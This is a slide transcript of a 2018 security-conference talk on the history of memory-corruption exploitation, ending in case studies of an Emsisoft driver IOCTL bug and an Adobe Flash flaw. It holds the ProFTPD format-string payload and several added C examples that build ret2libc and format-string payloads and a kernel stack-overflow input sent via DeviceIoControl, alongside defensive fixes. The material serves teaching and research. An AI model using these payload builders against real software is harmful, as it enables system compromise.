
NanoSec Conference 2018 - Exploitation Era

Nafiez
October 10, 2018

A presentation given at NanoSec Conference 2018, held in Malaysia, on the topic "Exploitation Era".


Transcript

  1. Exploitation Era
    Past, Present and Future

  2. About Us
    Nafiez @zeifan
    - Memory corruption hacker
    - Fuzzing & vulnerability research
    - Lives in "paradise"
    Yeh @iamyeh
    - Threat Researcher at Carbon Black
    - Malware reverse engineering
    - Vulnerability analysis

  3. What’s this talk about?

  4. Introduction
    ● Real-world memory corruption exploitation only (no XSS, SQLi, LFI, etc.)
    ● The mid-90s to early 2000s introduced most of the vulnerability classes and exploitation techniques
    ● Those vulnerability classes were mostly introduced on Linux
    ● Today most "in-the-wild" exploitation targets Windows

  5. Continued
    ● Since 2014 Windows has led in software security mitigations
    ● Exploitation techniques and vulnerability classes killed in modern OSes
    ● Current exploitation techniques on Windows

  6. 0-Day: Reported new bug last week and got this bounty this morning!

  7. The Past

  8. 1988: Morris Worm
    1995 - 1997: Buffer Overflow
    1998 - 2000: Exploits Evolution
    2001 - 2003: Protections Era
    2004 - 2006: Windows Era
    2007 - 2010: Evolution of Exploits

  9. Oct 2, 1988

  10. Morris Worm
    Exploited some 10,000 computers, among other things through the gets() stack overflow in fingerd
    https://docs.lib.purdue.edu/cgi/viewcontent.cgi?article=1701&context=cstech

  11. Oct 20, 1995

  12. Mudge (L0pht) released the tutorial "How to Write Buffer Overflows"
    https://insecure.org/stf/mudge_buffer_overflow_tutorial.html

  13. Nov 8, 1996

  14. Smashing the Stack for Fun and Profit
    Aleph One
    Complete write-up of stack overflow exploitation, Phrack 49
    http://phrack.org/issues/49/14.html

  15. Aug 10, 1997

  16. Ret-2-libc
    Solar Designer
    Bypassing a non-executable stack without injecting any code: the overflow
    overwrites the saved return address with the address of system() already
    present in libc, followed by a fake return address for system() and the
    address of a "/bin/sh" string as its argument.
    Stack layout after the overflow (low to high addresses):
      BUFFER (filler)
      Address of system() in libc      <- overwrites the saved return address
      Return address from system()
      Address of the string "/bin/sh\0"
    https://seclists.org/bugtraq/1997/Aug/63
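
The frame on the slide written out as bytes, as an added example that is not from the talk's slides or from the cited Bugtraq post. The padding length and the three addresses are assumptions chosen for illustration; a real exploit takes the padding from the crash and the addresses from the target's libc. It also checks the one thing that kills a strcpy()-delivered ret2libc frame in practice: a NUL byte inside one of the addresses.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example (not from the slides): the 32-bit ret2libc frame laid out
 * exactly as on the slide. Padding length and addresses are assumptions
 * chosen for illustration; a real exploit gets the padding from the crash
 * and the addresses from the target's libc. */
struct ret2libc_frame {
    size_t   pad;      /* bytes from the start of the buffer to the saved EIP */
    uint32_t system;   /* address of system() in libc */
    uint32_t ret;      /* what system() returns into (exit() for a clean exit) */
    uint32_t binsh;    /* address of a "/bin/sh\0" string */
};

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Write the payload into out (capacity cap). Returns its length, or 0 if it does not fit. */
size_t build_ret2libc(uint8_t *out, size_t cap, const struct ret2libc_frame *f) {
    size_t need = f->pad + 3 * sizeof(uint32_t);
    if (need > cap) return 0;
    memset(out, 'A', f->pad);                /* filler up to the saved return address */
    put_le32(out + f->pad,     f->system);   /* overwrites the saved EIP: RET lands in system() */
    put_le32(out + f->pad + 4, f->ret);      /* system()'s own return address */
    put_le32(out + f->pad + 8, f->binsh);    /* system()'s single argument: the command string */
    return need;
}

/* The word at position `index` (0 = system, 1 = ret, 2 = binsh) of a built payload,
 * i.e. what a debugger shows on the stack at the overwritten RET. */
uint32_t payload_word(const uint8_t *payload, size_t pad, int index) {
    return get_le32(payload + pad + 4 * (size_t)index);
}

/* How many bytes a strcpy()-style overflow would really deliver: it stops at the
 * first NUL, so an address containing a 0x00 byte truncates the frame there. */
size_t strcpy_copied(const uint8_t *payload, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0) return i;
    return len;
}
```

build_ret2libc() lays out filler, system(), the fake return address and the "/bin/sh" pointer in that order; strcpy_copied() reports how much of the frame a strcpy()-based overflow would actually copy, which is the whole payload when none of the addresses contains a zero byte and only the filler when, say, system() sits at an address like 0x0804a000.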

  17. Jan 31, 1999

  18. Heap Overflows
    w00w00 (Matt Conover)
    First tutorial on heap overflow exploitation
    http://www.w00w00.org/files/articles/heaptut.txt

  19. Sep 20, 1999

  20. Format String
    proftpd
    First publicly reported format string bug: the argument of the ls command
    reaches a printf-style function as the format string. The run of %u walks
    up the stack to the "XXXX" address bytes, %653300u pads the output to the
    value to be written, and %n stores that count through the address.
    ftp> ls
    aaaXXXX%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
    %u%u%u%u%u%u%u%u%u%653300u%n
    https://seclists.org/bugtraq/1999/Sep/328
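
How the %n write in that payload is sized, as an added example that is not from the slides or from the Bugtraq post. The pointer %n writes through is passed explicitly here instead of being reached by walking the stack, so the mechanism runs without corrupting anything; the 7-byte "aaaXXXX" prefix and the fixed-up log function are the only assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides): how the %n write in the ProFTPD
 * payload is sized. "%653300u" pads the output until the character count
 * equals the value to be written, and "%n" then stores that count through
 * the next pointer argument, which the earlier run of "%u" walked the stack
 * to (the "XXXX" bytes in the payload). Here the pointer is passed
 * explicitly, so the mechanism runs without any memory corruption. */

#define PREFIX "aaaXXXX"                 /* the payload's 7-byte prefix */
#define PREFIX_LEN (sizeof(PREFIX) - 1)

/* Field width for the %u so that the running character count reaches `target`. */
int width_for_target(unsigned target) {
    return target <= PREFIX_LEN ? 0 : (int)(target - PREFIX_LEN);
}

/* Format PREFIX "%<width>u%n" and return what %n stored. snprintf(NULL, 0, ...)
 * only counts characters, so 650 KB of padding needs no buffer and %n still
 * sees the full count, exactly as it would on a real output stream. */
unsigned value_written_by_n(unsigned target) {
    int stored = -1;
    snprintf(NULL, 0, PREFIX "%*u%n", width_for_target(target), 0u, &stored);
    return (unsigned)stored;
}

/* The fix for the bug class. The vulnerable form is snprintf(out, cap, user):
 * attacker text becomes the format. Passing it through "%s" makes any %u or %n
 * in it plain data. */
void log_fixed(char *out, size_t cap, const char *user) {
    snprintf(out, cap, "%s", user);
}
```

value_written_by_n(653300) returns 653300: the prefix contributes 7 characters and the padded %u the remaining 653293, which is what width_for_target() computes. Writing a full 32-bit address this way would mean padding to a multi-gigabyte count, which is why real exploits split the write into several short %n writes (or use %hn) rather than one huge width.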

  21. Nov 8, 2001

  22. Malloc Exploitation
    MaXX
    "Vudo malloc tricks": malloc exploitation techniques, Phrack 57
    http://phrack.org/issues/57/8.html

  23. Nov 8, 2001

  24. Free() Exploitation
    anonymous
    "Once upon a free()...": pioneering free() exploitation, Phrack 57
    http://phrack.org/issues/57/9.html

  25. Feb 7, 2002

  26. 3rd Generation Exploitation
    Halvar Flake
    1st Generation Exploits
    - Simple stack smashes
    - Control of EIP (via the RET instruction)
    - E.g. strcpy(), gets(), sprintf()
    - Easy peasy
    2nd Generation Exploits
    - Off-by-one overflows
    - E.g. strncat(), strncpy()
    - No direct EIP control; the saved EBP (frame pointer) is manipulated instead
    - Hard to find in nature
    3rd Generation Exploits
    - Format strings, heap structure corruption
    - E.g. printf(), malloc(), free()
    - Sometimes trivial to spot
    - No direct register control; exploitation goes through an arbitrary memory write
    https://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt

  27. July 30, 2002

  28. Integer Overflow
    Mark Dowd, Chris Spencer, Neel Mehta, Nishad Herath, Halvar Flake
    First public presentation of the integer overflow vulnerability class
    https://slideplayer.com/slide/9244035/
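
The allocation-size overflow that made this class matter, as an added example that is not from the slides or from the 2002 talk. The record format (a 32-bit count followed by 16-byte records) is constructed for the demonstration; the vulnerable size computation and the two checked forms are the general pattern.

```c
#include <stddef.h>
#include <stdint.h>

/* Added example (not from the slides): the allocation-size integer overflow.
 * count * RECORD_SIZE is computed in 32 bits and wraps, the allocation comes
 * out tiny, and the loop that trusts `count` writes far past it. The
 * [u32 count][records] blob format is constructed for this demo. */

#define RECORD_SIZE 16u

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Vulnerable: the product is computed in 32 bits and trusted.
 * For count = 0x10000001 this returns 16, i.e. room for exactly one record. */
uint32_t alloc_size_unchecked(uint32_t count) {
    return count * RECORD_SIZE;
}

/* What the copy loop would actually write, computed without wrapping. */
uint64_t bytes_loop_writes(uint32_t count) {
    return (uint64_t)count * RECORD_SIZE;
}

/* 1 when the vulnerable path allocates less than the loop writes: a heap overflow. */
int vuln_overflows(uint32_t count) {
    return bytes_loop_writes(count) > alloc_size_unchecked(count);
}

/* Hardened size computation: refuse any count whose product would wrap.
 * (gcc and clang also offer __builtin_mul_overflow for this.) Returns 0 on overflow. */
int alloc_size_checked(uint32_t count, uint32_t *out) {
    if (count > UINT32_MAX / RECORD_SIZE) return 0;
    *out = count * RECORD_SIZE;
    return 1;
}

/* Hardened parser for the demo blob: the count is bounded by the bytes actually
 * present, which is both the right semantic check and one that cannot wrap. */
int parse_record_count(const uint8_t *blob, size_t len, uint32_t *count_out) {
    if (len < 4) return -1;
    uint32_t count = le32(blob);
    if (count > (len - 4) / RECORD_SIZE) return -1;   /* more records claimed than bytes supplied */
    *count_out = count;
    return 0;
}
```

With count = 0x10000001 the unchecked size is 16 bytes while the loop writes 0x100000010 bytes; alloc_size_checked() rejects the count, and parse_record_count() rejects it earlier still because the input does not contain that many records. Bounding the count by the data actually supplied is the check to prefer, since it cannot be satisfied by a wrapped product.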

  29. Aug 2, 2003

  30. Win32 Device Driver Exploitation
    Sec-Labs
    METHOD_NEITHER IOCTL memory overwrite targeting Symantec AntiVirus (the NAVAP device)
    http://www.nsfocus.net/vulndb/5247
    Snippet as shown on the slide (macro-assembler syntax), opening the device:
    push 0
    push 0
    @pushsz "\\.\NAVAP"   ;open the device
    @callx CreateFileA    ;yeah - open it!
    mov ebx,eax           ;EBX=DEVICE HANDLE
    cmp eax,-1            ;error ;/
    jne _x00              ;if not jump to _x00 label
    @debug SPLOIT_TITLE,"Cannot open device ;/",IERROR
    jmp exit

  31. Sep 8, 2003

  32. Windows Server 2003
    David Litchfield
    Defeating the stack-based buffer overflow prevention mechanism (the /GS cookie) of Windows 2003 Server by overwriting the SEH handler
    https://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf

  33. Nov 2, 2004

  34. Heap Spraying
    SkyLined
    Demonstrated against Internet Explorer
    https://www.exploit-db.com/exploits/612/

  35. Jan 21, 2005

  36. Defeating Heap Protection and DEP Bypass
    Positive Technologies (Alexander Anisimov)
    Defeating heap protection and bypassing DEP on Windows XP SP2
    https://www.ptsecurity.com/upload/corporate/ww-en/download/defeating-xpsp2-heap-protection.pdf

  37. Feb 17, 2005

  38. Remote Windows Kernel Exploitation
    Barnaby Jack (RIP)
    "Remote Windows Kernel Exploitation: Step into the Ring 0", Black Hat USA 2005
    https://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Jack_White_Paper.pdf

  39. July 20, 2005

  40. Windows Kernel Pool Overflow
    Kinvis (SoBeIt), Beihang University, XCon 2005
    https://web.archive.org/web/20070221124210/http://xcon.xfocus.org/XCon2005/archives/2005/Xcon2005_SoBeIt.pdf

  41. Oct 2, 2005

  42. Hardware-Enforced DEP Bypass
    skape & Skywing
    "Bypassing Windows Hardware-enforced Data Execution Prevention", Uninformed vol. 2 (disabling DEP for the current process via NtSetInformationProcess)
    http://uninformed.org/index.cgi?v=all&a=11

  43. Dec 7, 2005

  44. Freelist[0] Exploitation Technique
    Brett Moore
    "Exploiting Freelist[0] On XP Service Pack 2"
    http://www.orkspace.net/secdocs/Windows/Protection/Bypass/Exploiting%20Freelist[0]%20On%20XP%20Service%20Pack%202.pdf

  45. Jan 19, 2007

  46. Double-Free Vulnerabilities
    Matthew Conover
    https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-1
    https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-2
    Heap free list before and after the double free:
    Before:
      freelist[n-1] [0x003401b8]  Flink 0x003401b8  Blink 0x003401b8
      freelist[n]   [0x003401c0]  Flink 0x00341fb0  Blink 0x00341fb0
      chunk         [0x00341fa8]  Flink 0x003401c0  Blink 0x003401c0
    After:
      freelist[n-1] same
      freelist[n]   same
      chunk         [0x00341fa8]  Flink 0x003401bc  Blink 0x003401c4

  47. Mar 27, 2007

  48. Heap Feng Shui
    Alex Sotirov
    "Heap Feng Shui in JavaScript": arranging the browser heap deterministically from JavaScript to attack Internet Explorer
    https://www.blackhat.com/presentations/bh-usa-07/Sotirov/Whitepaper/bh-usa-07-sotirov-WP.pdf

  49. Feb 17, 2008

  50. ASLR Smack & Laugh Reference
    Tilo Müller
    Seminar paper surveying techniques for bypassing ASLR on Linux
    https://ece.uwaterloo.ca/~vganesh/TEACHING/S2014/ECE458/aslr.pdf

  51. Aug 4, 2008

  52. Return-Oriented Programming
    Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham
    "Return-Oriented Programming: Exploits Without Code Injection", Black Hat USA 2008
    https://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf

  53. Case Study: Emsisoft Internet Security IOCTL Vulnerability

  54. Overview
    ● Found in 2015 via fuzzing
    ● Responsible disclosure to the vendor (Emsisoft)
    ● Vulnerable IOCTL 0x22e010
    ● Trivial to exploit:
      ○ Stack overflow in the IOCTL handler that lets the caller write kernel memory and redirect execution

  55. (image-only slide)

  56. (image-only slide)

  57. (image-only slide)

  58. Stack Overflow: Windows Kernel Exploitation Process
    01 Spawn processes
    02 Get a handle to the vulnerable device
    03 Reach the vulnerable IOCTL function
    04 Allocate a buffer holding the shellcode
    05 Craft the input buffer so the overflow redirects execution into the shellcode
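
The user-mode side of steps 02 to 05, as an added example that is not from the slides or from the authors' exploit, written against a hypothetical driver. The device name, the distance to the saved return address and the shellcode address are assumptions; step 01 and the shellcode itself depend on the payload and are not shown. The IOCTL decoding follows the CTL_CODE field layout and is the same check the Sec-Labs NAVAP case on slide 30 needs to tell METHOD_NEITHER from METHOD_BUFFERED.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Added example (not from the slides): user-mode side of the five-step
 * procedure against a hypothetical driver. The device name, overflow offset
 * and shellcode address are assumptions; the IOCTL decoding follows the
 * CTL_CODE macro layout from the Windows DDK. */

struct ioctl_fields { uint32_t device_type, function, access, method; };

/* CTL_CODE(DeviceType, Function, Method, Access)
 *   = DeviceType << 16 | Access << 14 | Function << 2 | Method */
uint32_t make_ioctl(uint32_t device_type, uint32_t function, uint32_t method, uint32_t access) {
    return device_type << 16 | access << 14 | function << 2 | method;
}

struct ioctl_fields decode_ioctl(uint32_t code) {
    struct ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2) & 0xfff;
    f.method      = code & 0x3;   /* 0 BUFFERED, 1 IN_DIRECT, 2 OUT_DIRECT, 3 NEITHER */
    return f;
}

/* Step 05: input that overruns a fixed-size stack buffer in the handler and
 * lands a user-mode pointer (the shellcode page from step 04) in the saved
 * return address. ret_offset is the distance to that slot; a 32-bit kernel
 * is assumed, so the pointer is four little-endian bytes. */
size_t build_overflow_input(uint8_t *out, size_t cap, size_t ret_offset, uint32_t shellcode_addr) {
    if (ret_offset + 4 > cap) return 0;
    memset(out, 'A', ret_offset);                          /* filler up to the saved return address */
    out[ret_offset + 0] = (uint8_t)shellcode_addr;
    out[ret_offset + 1] = (uint8_t)(shellcode_addr >> 8);
    out[ret_offset + 2] = (uint8_t)(shellcode_addr >> 16);
    out[ret_offset + 3] = (uint8_t)(shellcode_addr >> 24);
    return ret_offset + 4;
}

#ifdef _WIN32
/* Steps 02 and 03: open the device (what the slide-30 assembly does with
 * CreateFileA) and reach the handler with DeviceIoControl. For METHOD_NEITHER
 * the driver receives the raw user pointer; for METHOD_BUFFERED the I/O manager
 * copies the input into a system buffer first, but the overflow inside the
 * handler's own stack buffer is the same. Returns 1 if the call succeeded. */
int send_ioctl(const char *device, uint32_t code, uint8_t *in, DWORD in_len) {
    HANDLE h = CreateFileA(device, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                           OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return 0;
    DWORD returned = 0;
    BOOL ok = DeviceIoControl(h, code, in, in_len, NULL, 0, &returned, NULL);
    CloseHandle(h);
    return ok ? 1 : 0;
}
#endif
```

decode_ioctl(0x22e010) gives device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x804, METHOD_BUFFERED and read/write access, so unlike the Symantec NAVAP case the Emsisoft handler sees a kernel copy of the input rather than the raw user pointer; the offset to the saved return address still has to come from the crash in the debugger, and on a 64-bit kernel the pointer would be eight bytes.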

  59. Present

  60. Past Exploitation Development
    01 Use-After-Free: a UAF vulnerability is found; to exploit it, the vulnerability is chained with Adobe Flash.
    02 ROP + Info Leak: the ROP chain is built from the browser UAF and chained through Adobe Flash; an ASLR bypass via an info leak is required.
    03 Full Code Execution: exploitation was trivial.

  61. What happened?
    Developer: developers failed to audit legacy code, made no changes, kept using old frameworks, etc.
    Vulnerability classes: the old vulnerability types and classes still exist.
    Patching: patches introduced new vulnerabilities.
    Exploitation: exploitation is getting more complex and requires a chain of vulnerabilities.

  62. What has changed?

  63. http://gaasedelen.blogspot.com/2014/03/exploiting-icofx-26-cve-2013-4988.html

  64. Windows Memory Safety Mitigations
    NX / DEP
    SEHOP / ASLR
    MemGC
    CFG
    ACG / RFG
    Hyper-V based security (VBS): kernel-level enforcement (enabling ACG, CIG, RFG, CFG), CFI

  65. Vulnerability Classes Killer
    Edge Attack Surface Reduction: remove the legacy features Internet Explorer has.
    Memory Garbage Collection (MemGC): focuses on the DOM engine and makes UAF in the DOM non-exploitable.
    Type Confusion Protection: additional checks to eliminate recurring bad casts and wrong branching on CTreePos.
    Result: stack corruption essentially eliminated; use-after-free attacks decreased; rise of out-of-bounds, DLL planting and type confusion.
    https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf

  66. Current Exploitation Development
    01 Use-After-Free: the vulnerability found is a UAF; to gain an info leak it usually has to be turned into a type confusion (in some cases this is not needed).
    02 Type Confusion: usually used as one link of the vulnerability chain.
    03 Information Leak: an information leak is needed to bypass ASLR; this is what makes the exploit reliable.
    04 Sandbox & Mitigation Bypass: current Windows mitigations require multiple chained bypasses, including CFG and ACG.
    05 Full Code Execution: full code execution (including remote) with all mitigations bypassed.

  67. Case Study (PSIRT-8422): Adobe Flash ActiveX NULL Pointer

  68. Overview
    ● Found via manual audit, focused on Adobe Flash Player ActiveX (29.0.0.171)
    ● Responsible disclosure to the vendor (Adobe)
    ● Integer overflow in the ActiveX control that turns into a NULL pointer dereference
      ○ Adobe did not set the Kill Bit in the registry by default
    ● Exploit attempt failed due to memory safety mitigations

  69. (image-only slide)

  70. Future (Past)

  71. ● Exploitation is much harder
    ● Hardware-based mitigations, and bypasses of them
    ● Past vulnerability classes remain
    ● More chained exploitation
    ● Software mitigations keep improving
    ● Advanced exploitation can still evade the security perimeter

  72. Intel Control-flow Enforcement Technology (CET)
    ➢ Shadow Stack (bypass?)
      ○ A second stack used only for control transfer operations (CALL/RET)
      ○ Separate from the data stack; can be enabled for user mode or supervisor mode
      ○ Protects return addresses and defends against ROP
    ➢ Indirect Branch Tracking (bypass?)
      ○ A new instruction, ENDBRANCH, marks the valid indirect CALL/JMP targets in the program
      ○ Protects free branches against JOP / COP
    https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf

  73. Conclusion

  74. (image-only slide)

  75. References & Thanks
    ● Thanks to KLKS for reviewing our slides
    ● NanoSec crew
    ● Haroon Meer, Black Hat USA 2010 paper on the history of memory corruption attacks
      ○ https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History-of-Memory-Corruption-Attacks-wp.pdf
    ● ...and the many papers we used as references :)
    ● Ping us on Telegram (OWASP Malaysia) if you want to talk about exploitation and reverse engineering.